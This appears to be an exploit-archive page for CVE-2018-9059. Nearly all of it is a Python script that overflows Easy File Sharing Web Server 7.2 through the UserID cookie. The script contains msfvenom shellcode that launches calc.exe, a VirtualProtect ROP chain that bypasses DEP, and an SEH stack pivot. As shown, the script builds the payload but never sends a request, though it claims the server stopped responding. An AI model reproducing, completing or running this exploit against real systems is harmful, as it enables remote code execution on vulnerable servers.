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Easy File Sharing Web Server 7.2 UserID Buffer Overflow

Easy File Sharing Web Server 7.2 UserID Buffer Overflow
Posted Apr 24, 2018
Authored by Hashim Jawad

Easy File Sharing Web Server version 7.2 UserID remote buffer overflow exploit with DEP bypass.

tags | exploit, remote, web, overflow
advisories | CVE-2018-9059
SHA-256 | 4921ef9c36be40af22b9321dd08429c158a520e6f64cea812a68495053776355

Easy File Sharing Web Server 7.2 UserID Buffer Overflow

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#!/usr/bin/env python
# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
# Date : 04/24/2018 #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sharing-file.com/ #
# Software Link : http://www.sharing-file.com/efssetup.exe #
# Original Exploit: https://www.exploit-db.com/exploits/44485/ #
# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 #

import requests
import struct
import time


# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Payload size: 447 bytes

shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"

# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
buffer = '\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)

# mona.py VirtualProtect() ROP template with few modifications

# ESI = ptr to VirtualProtect()
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]
buffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]

# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]

# EDX = NewProtect (0x40)
buffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]

# ECX = lpOldProtect (ptr to W address)
buffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]

# EBX = dwSize (0x00000501)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate
buffer += struct.pack('<L', 0x100231d1) # NEG EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]

buffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]

# EAX = NOP (0x90909090)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x90909090) # nop
buffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]

buffer += "\x90" * 50 # nop
buffer += shellcode # calc.exe
buffer += "\x90" * 50 # nop

buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100)
buffer += '\x42' * 4 # nSEH filler

# stack pivot that will land somewhere in buffer of As
buffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]

buffer += '\x44' * (5000-4059-4-4)

print "[+] Sending %s bytes of evil payload.." %len(buffer)

cookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')
print "The server stopped responding. You should see calc.exe by now ;D"
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